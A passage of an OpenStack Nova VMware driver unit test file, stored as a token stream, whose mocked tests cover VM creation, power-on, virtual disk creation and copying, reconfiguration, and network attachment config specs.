string|"'fake_config_spec'"
op|','
nl|'\n'
string|"'fake_res_pool_ref'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'fake_vm_ref'"
op|','
name|'vm_ref'
op|')'
newline|'\n'
nl|'\n'
name|'call_method'
op|'.'
name|'assert_called_once_with'
op|'('
name|'mock'
op|'.'
name|'ANY'
op|','
string|"'CreateVM_Task'"
op|','
nl|'\n'
string|"'fake_vm_folder'"
op|','
name|'config'
op|'='
string|"'fake_config_spec'"
op|','
nl|'\n'
name|'pool'
op|'='
string|"'fake_res_pool_ref'"
op|')'
newline|'\n'
name|'wait_for_task'
op|'.'
name|'assert_called_once_with'
op|'('
string|"'fake_create_vm_task'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vm_util'
op|'.'
name|'LOG'
op|','
string|"'warning'"
op|')'
newline|'\n'
DECL|member|test_create_vm_invalid_guestid
name|'def'
name|'test_create_vm_invalid_guestid'
op|'('
name|'self'
op|','
name|'mock_log_warn'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Ensure we warn when create_vm() fails after we passed an\n unrecognised guestId\n """'
newline|'\n'
nl|'\n'
name|'found'
op|'='
op|'['
name|'False'
op|']'
newline|'\n'
nl|'\n'
DECL|function|fake_log_warn
name|'def'
name|'fake_log_warn'
op|'('
name|'msg'
op|','
name|'values'
op|')'
op|':'
newline|'\n'
indent|' '
name|'if'
name|'not'
name|'isinstance'
op|'('
name|'values'
op|','
name|'dict'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
newline|'\n'
dedent|''
name|'if'
name|'values'
op|'.'
name|'get'
op|'('
string|"'ostype'"
op|')'
op|'=='
string|"'invalid_os_type'"
op|':'
newline|'\n'
indent|' '
name|'found'
op|'['
number|'0'
op|']'
op|'='
name|'True'
newline|'\n'
dedent|''
dedent|''
name|'mock_log_warn'
op|'.'
name|'side_effect'
op|'='
name|'fake_log_warn'
newline|'\n'
nl|'\n'
name|'session'
op|'='
name|'driver'
op|'.'
name|'VMwareAPISession'
op|'('
op|')'
newline|'\n'
nl|'\n'
name|'config_spec'
op|'='
name|'vm_util'
op|'.'
name|'get_vm_create_spec'
op|'('
nl|'\n'
name|'session'
op|'.'
name|'vim'
op|'.'
name|'client'
op|'.'
name|'factory'
op|','
nl|'\n'
name|'self'
op|'.'
name|'_instance'
op|','
string|"'fake-datastore'"
op|','
op|'['
op|']'
op|','
nl|'\n'
name|'vm_util'
op|'.'
name|'ExtraSpecs'
op|'('
op|')'
op|','
nl|'\n'
name|'os_type'
op|'='
string|"'invalid_os_type'"
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'vexc'
op|'.'
name|'VMwareDriverException'
op|','
nl|'\n'
name|'vm_util'
op|'.'
name|'create_vm'
op|','
name|'session'
op|','
name|'self'
op|'.'
name|'_instance'
op|','
nl|'\n'
string|"'folder'"
op|','
name|'config_spec'
op|','
string|"'res-pool'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'found'
op|'['
number|'0'
op|']'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_convert_vif_model
dedent|''
name|'def'
name|'test_convert_vif_model'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'expected'
op|'='
string|'"VirtualE1000"'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'convert_vif_model'
op|'('
name|'network_model'
op|'.'
name|'VIF_MODEL_E1000'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
name|'expected'
op|'='
string|'"VirtualE1000e"'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'convert_vif_model'
op|'('
name|'network_model'
op|'.'
name|'VIF_MODEL_E1000E'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
name|'types'
op|'='
op|'['
string|'"VirtualE1000"'
op|','
string|'"VirtualE1000e"'
op|','
string|'"VirtualPCNet32"'
op|','
nl|'\n'
string|'"VirtualVmxnet"'
op|','
string|'"VirtualVmxnet3"'
op|']'
newline|'\n'
name|'for'
name|'type'
name|'in'
name|'types'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'type'
op|','
nl|'\n'
name|'vm_util'
op|'.'
name|'convert_vif_model'
op|'('
name|'type'
op|')'
op|')'
newline|'\n'
dedent|''
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'Invalid'
op|','
nl|'\n'
name|'vm_util'
op|'.'
name|'convert_vif_model'
op|','
nl|'\n'
string|'"InvalidVifModel"'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_power_on_instance_with_vm_ref
dedent|''
name|'def'
name|'test_power_on_instance_with_vm_ref'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|'"_call_method"'
op|','
nl|'\n'
name|'return_value'
op|'='
string|"'fake-task'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|'"_wait_for_task"'
op|')'
op|','
nl|'\n'
op|')'
name|'as'
op|'('
name|'fake_call_method'
op|','
name|'fake_wait_for_task'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vm_util'
op|'.'
name|'power_on_instance'
op|'('
name|'session'
op|','
name|'self'
op|'.'
name|'_instance'
op|','
nl|'\n'
name|'vm_ref'
op|'='
string|"'fake-vm-ref'"
op|')'
newline|'\n'
name|'fake_call_method'
op|'.'
name|'assert_called_once_with'
op|'('
name|'session'
op|'.'
name|'vim'
op|','
nl|'\n'
string|'"PowerOnVM_Task"'
op|','
nl|'\n'
string|"'fake-vm-ref'"
op|')'
newline|'\n'
name|'fake_wait_for_task'
op|'.'
name|'assert_called_once_with'
op|'('
string|"'fake-task'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_power_on_instance_without_vm_ref
dedent|''
dedent|''
name|'def'
name|'test_power_on_instance_without_vm_ref'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vm_util'
op|','
string|'"get_vm_ref"'
op|','
nl|'\n'
name|'return_value'
op|'='
string|"'fake-vm-ref'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|'"_call_method"'
op|','
nl|'\n'
name|'return_value'
op|'='
string|"'fake-task'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|'"_wait_for_task"'
op|')'
op|','
nl|'\n'
op|')'
name|'as'
op|'('
name|'fake_get_vm_ref'
op|','
name|'fake_call_method'
op|','
name|'fake_wait_for_task'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vm_util'
op|'.'
name|'power_on_instance'
op|'('
name|'session'
op|','
name|'self'
op|'.'
name|'_instance'
op|')'
newline|'\n'
name|'fake_get_vm_ref'
op|'.'
name|'assert_called_once_with'
op|'('
name|'session'
op|','
name|'self'
op|'.'
name|'_instance'
op|')'
newline|'\n'
name|'fake_call_method'
op|'.'
name|'assert_called_once_with'
op|'('
name|'session'
op|'.'
name|'vim'
op|','
nl|'\n'
string|'"PowerOnVM_Task"'
op|','
nl|'\n'
string|"'fake-vm-ref'"
op|')'
newline|'\n'
name|'fake_wait_for_task'
op|'.'
name|'assert_called_once_with'
op|'('
string|"'fake-task'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_power_on_instance_with_exception
dedent|''
dedent|''
name|'def'
name|'test_power_on_instance_with_exception'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|'"_call_method"'
op|','
nl|'\n'
name|'return_value'
op|'='
string|"'fake-task'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|'"_wait_for_task"'
op|','
nl|'\n'
name|'side_effect'
op|'='
name|'exception'
op|'.'
name|'NovaException'
op|'('
string|"'fake'"
op|')'
op|')'
op|','
nl|'\n'
op|')'
name|'as'
op|'('
name|'fake_call_method'
op|','
name|'fake_wait_for_task'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'NovaException'
op|','
nl|'\n'
name|'vm_util'
op|'.'
name|'power_on_instance'
op|','
nl|'\n'
name|'session'
op|','
name|'self'
op|'.'
name|'_instance'
op|','
nl|'\n'
name|'vm_ref'
op|'='
string|"'fake-vm-ref'"
op|')'
newline|'\n'
name|'fake_call_method'
op|'.'
name|'assert_called_once_with'
op|'('
name|'session'
op|'.'
name|'vim'
op|','
nl|'\n'
string|'"PowerOnVM_Task"'
op|','
nl|'\n'
string|"'fake-vm-ref'"
op|')'
newline|'\n'
name|'fake_wait_for_task'
op|'.'
name|'assert_called_once_with'
op|'('
string|"'fake-task'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_power_on_instance_with_power_state_exception
dedent|''
dedent|''
name|'def'
name|'test_power_on_instance_with_power_state_exception'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|'"_call_method"'
op|','
nl|'\n'
name|'return_value'
op|'='
string|"'fake-task'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
nl|'\n'
name|'session'
op|','
string|'"_wait_for_task"'
op|','
nl|'\n'
name|'side_effect'
op|'='
name|'vexc'
op|'.'
name|'InvalidPowerStateException'
op|')'
op|','
nl|'\n'
op|')'
name|'as'
op|'('
name|'fake_call_method'
op|','
name|'fake_wait_for_task'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vm_util'
op|'.'
name|'power_on_instance'
op|'('
name|'session'
op|','
name|'self'
op|'.'
name|'_instance'
op|','
nl|'\n'
name|'vm_ref'
op|'='
string|"'fake-vm-ref'"
op|')'
newline|'\n'
name|'fake_call_method'
op|'.'
name|'assert_called_once_with'
op|'('
name|'session'
op|'.'
name|'vim'
op|','
nl|'\n'
string|'"PowerOnVM_Task"'
op|','
nl|'\n'
string|"'fake-vm-ref'"
op|')'
newline|'\n'
name|'fake_wait_for_task'
op|'.'
name|'assert_called_once_with'
op|'('
string|"'fake-task'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_virtual_disk
dedent|''
dedent|''
name|'def'
name|'test_create_virtual_disk'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'dm'
op|'='
name|'session'
op|'.'
name|'vim'
op|'.'
name|'service_content'
op|'.'
name|'virtualDiskManager'
newline|'\n'
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'vm_util'
op|','
string|'"get_vmdk_create_spec"'
op|','
nl|'\n'
name|'return_value'
op|'='
string|"'fake-spec'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|'"_call_method"'
op|','
nl|'\n'
name|'return_value'
op|'='
string|"'fake-task'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|'"_wait_for_task"'
op|')'
op|','
nl|'\n'
op|')'
name|'as'
op|'('
name|'fake_get_spec'
op|','
name|'fake_call_method'
op|','
name|'fake_wait_for_task'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vm_util'
op|'.'
name|'create_virtual_disk'
op|'('
name|'session'
op|','
string|"'fake-dc-ref'"
op|','
nl|'\n'
string|"'fake-adapter-type'"
op|','
string|"'fake-disk-type'"
op|','
nl|'\n'
string|"'fake-path'"
op|','
number|'7'
op|')'
newline|'\n'
name|'fake_get_spec'
op|'.'
name|'assert_called_once_with'
op|'('
nl|'\n'
name|'session'
op|'.'
name|'vim'
op|'.'
name|'client'
op|'.'
name|'factory'
op|','
number|'7'
op|','
nl|'\n'
string|"'fake-adapter-type'"
op|','
nl|'\n'
string|"'fake-disk-type'"
op|')'
newline|'\n'
name|'fake_call_method'
op|'.'
name|'assert_called_once_with'
op|'('
nl|'\n'
name|'session'
op|'.'
name|'vim'
op|','
nl|'\n'
string|'"CreateVirtualDisk_Task"'
op|','
nl|'\n'
name|'dm'
op|','
nl|'\n'
name|'name'
op|'='
string|"'fake-path'"
op|','
nl|'\n'
name|'datacenter'
op|'='
string|"'fake-dc-ref'"
op|','
nl|'\n'
name|'spec'
op|'='
string|"'fake-spec'"
op|')'
newline|'\n'
name|'fake_wait_for_task'
op|'.'
name|'assert_called_once_with'
op|'('
string|"'fake-task'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_copy_virtual_disk
dedent|''
dedent|''
name|'def'
name|'test_copy_virtual_disk'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'dm'
op|'='
name|'session'
op|'.'
name|'vim'
op|'.'
name|'service_content'
op|'.'
name|'virtualDiskManager'
newline|'\n'
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|'"_call_method"'
op|','
nl|'\n'
name|'return_value'
op|'='
string|"'fake-task'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|'"_wait_for_task"'
op|')'
op|','
nl|'\n'
op|')'
name|'as'
op|'('
name|'fake_call_method'
op|','
name|'fake_wait_for_task'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vm_util'
op|'.'
name|'copy_virtual_disk'
op|'('
name|'session'
op|','
string|"'fake-dc-ref'"
op|','
nl|'\n'
string|"'fake-source'"
op|','
string|"'fake-dest'"
op|')'
newline|'\n'
name|'fake_call_method'
op|'.'
name|'assert_called_once_with'
op|'('
nl|'\n'
name|'session'
op|'.'
name|'vim'
op|','
nl|'\n'
string|'"CopyVirtualDisk_Task"'
op|','
nl|'\n'
name|'dm'
op|','
nl|'\n'
name|'sourceName'
op|'='
string|"'fake-source'"
op|','
nl|'\n'
name|'sourceDatacenter'
op|'='
string|"'fake-dc-ref'"
op|','
nl|'\n'
name|'destName'
op|'='
string|"'fake-dest'"
op|')'
newline|'\n'
name|'fake_wait_for_task'
op|'.'
name|'assert_called_once_with'
op|'('
string|"'fake-task'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|_create_fake_vm_objects
dedent|''
dedent|''
name|'def'
name|'_create_fake_vm_objects'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_objects'
op|'='
name|'fake'
op|'.'
name|'FakeRetrieveResult'
op|'('
op|')'
newline|'\n'
name|'fake_objects'
op|'.'
name|'add_object'
op|'('
name|'fake'
op|'.'
name|'VirtualMachine'
op|'('
op|')'
op|')'
newline|'\n'
name|'return'
name|'fake_objects'
newline|'\n'
nl|'\n'
DECL|member|test_reconfigure_vm
dedent|''
name|'def'
name|'test_reconfigure_vm'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'return_value'
op|'='
string|"'fake_reconfigure_task'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'session'
op|','
string|"'_wait_for_task'"
op|')'
nl|'\n'
op|')'
name|'as'
op|'('
name|'_call_method'
op|','
name|'_wait_for_task'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vm_util'
op|'.'
name|'reconfigure_vm'
op|'('
name|'session'
op|','
string|"'fake-ref'"
op|','
string|"'fake-spec'"
op|')'
newline|'\n'
name|'_call_method'
op|'.'
name|'assert_called_once_with'
op|'('
name|'mock'
op|'.'
name|'ANY'
op|','
nl|'\n'
string|"'ReconfigVM_Task'"
op|','
string|"'fake-ref'"
op|','
name|'spec'
op|'='
string|"'fake-spec'"
op|')'
newline|'\n'
name|'_wait_for_task'
op|'.'
name|'assert_called_once_with'
op|'('
nl|'\n'
string|"'fake_reconfigure_task'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|_get_network_attach_config_spec_opaque
dedent|''
dedent|''
name|'def'
name|'_get_network_attach_config_spec_opaque'
op|'('
name|'self'
op|','
name|'network_ref'
op|','
nl|'\n'
name|'vc6_onwards'
op|'='
name|'False'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vif_info'
op|'='
op|'{'
string|"'network_name'"
op|':'
string|"'fake-name'"
op|','
nl|'\n'
string|"'mac_address'"
op|':'
string|"'00:00:00:ca:fe:01'"
op|','
nl|'\n'
string|"'network_ref'"
op|':'
name|'network_ref'
op|','
nl|'\n'
string|"'iface_id'"
op|':'
number|'7'
op|','
nl|'\n'
string|"'vif_model'"
op|':'
string|"'VirtualE1000'"
op|'}'
newline|'\n'
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_network_attach_config_spec'
op|'('
nl|'\n'
name|'fake_factory'
op|','
name|'vif_info'
op|','
number|'1'
op|')'
newline|'\n'
name|'card'
op|'='
string|"'ns0:VirtualEthernetCardOpaqueNetworkBackingInfo'"
newline|'\n'
name|'expected'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineConfigSpec'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'='
op|'['
op|']'
newline|'\n'
nl|'\n'
name|'extra_config'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:OptionValue'"
op|')'
newline|'\n'
name|'extra_config'
op|'.'
name|'value'
op|'='
name|'vif_info'
op|'['
string|"'iface_id'"
op|']'
newline|'\n'
name|'extra_config'
op|'.'
name|'key'
op|'='
string|"'nvp.iface-id.1'"
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'.'
name|'append'
op|'('
name|'extra_config'
op|')'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'='
op|'['
op|']'
newline|'\n'
name|'device_change'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualDeviceConfigSpec'"
op|')'
newline|'\n'
name|'device_change'
op|'.'
name|'operation'
op|'='
string|"'add'"
newline|'\n'
nl|'\n'
name|'device'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualE1000'"
op|')'
newline|'\n'
name|'device'
op|'.'
name|'macAddress'
op|'='
name|'vif_info'
op|'['
string|"'mac_address'"
op|']'
newline|'\n'
name|'if'
name|'network_ref'
op|'['
string|"'use-external-id'"
op|']'
op|':'
newline|'\n'
indent|' '
name|'if'
name|'vc6_onwards'
op|':'
newline|'\n'
indent|' '
name|'device'
op|'.'
name|'externalId'
op|'='
name|'vif_info'
op|'['
string|"'iface_id'"
op|']'
newline|'\n'
dedent|''
name|'else'
op|':'
newline|'\n'
indent|' '
name|'dp'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:DynamicProperty'"
op|')'
newline|'\n'
name|'dp'
op|'.'
name|'name'
op|'='
string|"'__externalId__'"
newline|'\n'
name|'dp'
op|'.'
name|'val'
op|'='
name|'vif_info'
op|'['
string|"'iface_id'"
op|']'
newline|'\n'
name|'device'
op|'.'
name|'dynamicProperty'
op|'='
op|'['
name|'dp'
op|']'
newline|'\n'
dedent|''
dedent|''
name|'device'
op|'.'
name|'addressType'
op|'='
string|"'manual'"
newline|'\n'
name|'connectable'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualDeviceConnectInfo'"
op|')'
newline|'\n'
name|'connectable'
op|'.'
name|'allowGuestControl'
op|'='
name|'True'
newline|'\n'
name|'connectable'
op|'.'
name|'startConnected'
op|'='
name|'True'
newline|'\n'
name|'connectable'
op|'.'
name|'connected'
op|'='
name|'True'
newline|'\n'
name|'device'
op|'.'
name|'connectable'
op|'='
name|'connectable'
newline|'\n'
name|'backing'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
name|'card'
op|')'
newline|'\n'
name|'backing'
op|'.'
name|'opaqueNetworkType'
op|'='
name|'vif_info'
op|'['
string|"'network_ref'"
op|']'
op|'['
string|"'network-type'"
op|']'
newline|'\n'
name|'backing'
op|'.'
name|'opaqueNetworkId'
op|'='
name|'vif_info'
op|'['
string|"'network_ref'"
op|']'
op|'['
string|"'network-id'"
op|']'
newline|'\n'
name|'device'
op|'.'
name|'backing'
op|'='
name|'backing'
newline|'\n'
name|'device'
op|'.'
name|'key'
op|'='
op|'-'
number|'47'
newline|'\n'
name|'device'
op|'.'
name|'wakeOnLanEnabled'
op|'='
name|'True'
newline|'\n'
name|'device_change'
op|'.'
name|'device'
op|'='
name|'device'
newline|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'.'
name|'append'
op|'('
name|'device_change'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_network_attach_config_spec_opaque_integration_bridge
dedent|''
name|'def'
name|'test_get_network_attach_config_spec_opaque_integration_bridge'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'network_ref'
op|'='
op|'{'
string|"'type'"
op|':'
string|"'OpaqueNetwork'"
op|','
nl|'\n'
string|"'network-id'"
op|':'
string|"'fake-network-id'"
op|','
nl|'\n'
string|"'network-type'"
op|':'
string|"'opaque'"
op|','
nl|'\n'
string|"'use-external-id'"
op|':'
name|'False'
op|'}'
newline|'\n'
name|'self'
op|'.'
name|'_get_network_attach_config_spec_opaque'
op|'('
name|'network_ref'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_network_attach_config_spec_opaque
dedent|''
name|'def'
name|'test_get_network_attach_config_spec_opaque'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'network_ref'
op|'='
op|'{'
string|"'type'"
op|':'
string|"'OpaqueNetwork'"
op|','
nl|'\n'
string|"'network-id'"
op|':'
string|"'fake-network-id'"
op|','
nl|'\n'
string|"'network-type'"
op|':'
string|"'nsx.LogicalSwitch'"
op|','
nl|'\n'
string|"'use-external-id'"
op|':'
name|'True'
op|'}'
newline|'\n'
name|'self'
op|'.'
name|'_get_network_attach_config_spec_opaque'
op|'('
name|'network_ref'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'fake'
op|','
string|"'DataObject'"
op|')'
newline|'\n'
DECL|member|test_get_network_attach_config_spec_opaque_vc6_onwards
name|'def'
name|'test_get_network_attach_config_spec_opaque_vc6_onwards'
op|'('
name|'self'
op|','
nl|'\n'
name|'mock_object'
op|')'
op|':'
newline|'\n'
comment|'# Add new attribute externalId supported from VC6'
nl|'\n'
DECL|class|FakeVirtualE1000
indent|' '
name|'class'
name|'FakeVirtualE1000'
op|'('
name|'fake'
op|'.'
name|'DataObject'
op|')'
op|':'
newline|'\n'
DECL|member|__init__
indent|' '
name|'def'
name|'__init__'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'FakeVirtualE1000'
op|','
name|'self'
op|')'
op|'.'
name|'__init__'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'externalId'
op|'='
name|'None'
newline|'\n'
nl|'\n'
dedent|''
dedent|''
name|'mock_object'
op|'.'
name|'return_value'
op|'='
name|'FakeVirtualE1000'
newline|'\n'
name|'network_ref'
op|'='
op|'{'
string|"'type'"
op|':'
string|"'OpaqueNetwork'"
op|','
nl|'\n'
string|"'network-id'"
op|':'
string|"'fake-network-id'"
op|','
nl|'\n'
string|"'network-type'"
op|':'
string|"'nsx.LogicalSwitch'"
op|','
nl|'\n'
string|"'use-external-id'"
op|':'
name|'True'
op|'}'
newline|'\n'
name|'self'
op|'.'
name|'_get_network_attach_config_spec_opaque'
op|'('
name|'network_ref'
op|','
nl|'\n'
name|'vc6_onwards'
op|'='
name|'True'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_network_attach_config_spec_dvs
dedent|''
name|'def'
name|'test_get_network_attach_config_spec_dvs'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vif_info'
op|'='
op|'{'
string|"'network_name'"
op|':'
string|"'br100'"
op|','
nl|'\n'
string|"'mac_address'"
op|':'
string|"'00:00:00:ca:fe:01'"
op|','
nl|'\n'
string|"'network_ref'"
op|':'
op|'{'
string|"'type'"
op|':'
string|"'DistributedVirtualPortgroup'"
op|','
nl|'\n'
string|"'dvsw'"
op|':'
string|"'fake-network-id'"
op|','
nl|'\n'
string|"'dvpg'"
op|':'
string|"'fake-group'"
op|'}'
op|','
nl|'\n'
string|"'iface_id'"
op|':'
number|'7'
op|','
nl|'\n'
string|"'vif_model'"
op|':'
string|"'VirtualE1000'"
op|'}'
newline|'\n'
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_network_attach_config_spec'
op|'('
nl|'\n'
name|'fake_factory'
op|','
name|'vif_info'
op|','
number|'1'
op|')'
newline|'\n'
name|'port'
op|'='
string|"'ns0:DistributedVirtualSwitchPortConnection'"
newline|'\n'
name|'backing'
op|'='
string|"'ns0:VirtualEthernetCardDistributedVirtualPortBackingInfo'"
newline|'\n'
nl|'\n'
name|'expected'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineConfigSpec'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'='
op|'['
op|']'
newline|'\n'
nl|'\n'
name|'extra_config'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:OptionValue'"
op|')'
newline|'\n'
name|'extra_config'
op|'.'
name|'value'
op|'='
name|'vif_info'
op|'['
string|"'iface_id'"
op|']'
newline|'\n'
name|'extra_config'
op|'.'
name|'key'
op|'='
string|"'nvp.iface-id.1'"
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'.'
name|'append'
op|'('
name|'extra_config'
op|')'
newline|'\n'
nl|'\n'
name|'expected'
op|'.'
name|'deviceChange'
op|'='
op|'['
op|']'
newline|'\n'
nl|'\n'
name|'device_change'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualDeviceConfigSpec'"
op|')'
newline|'\n'
name|'device_change'
op|'.'
name|'operation'
op|'='
string|"'add'"
newline|'\n'
nl|'\n'
name|'device'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualE1000'"
op|')'
newline|'\n'
name|'device'
op|'.'
name|'macAddress'
op|'='
name|'vif_info'
op|'['
string|"'mac_address'"
op|']'
newline|'\n'
name|'device'
op|'.'
name|'key'
op|'='
op|'-'
number|'47'
newline|'\n'
name|'device'
op|'.'
name|'addressType'
op|'='
string|"'manual'"
newline|'\n'
name|'device'
op|'.'
name|'wakeOnLanEnabled'
op|'='
name|'True'
newline|'\n'
nl|'\n'
name|'device'
op|'.'
name|'backing'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
name|'backing'
op|')'
newline|'\n'
name|'device'
op|'.'
name|'backing'
op|'.'
name|'port'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
name|'port'
op|')'
newline|'\n'
name|'device'
op|'.'
name|'backing'
op|'.'
name|'port'
op|'.'
name|'portgroupKey'
op|'='
name|'vif_info'
op|'['
string|"'network_ref'"
op|']'
op|'['
string|"'dvpg'"
op|']'
newline|'\n'
name|'device'
op|'.'
name|'backing'
op|'.'
name|'port'
op|'.'
name|'switchUuid'
op|'='
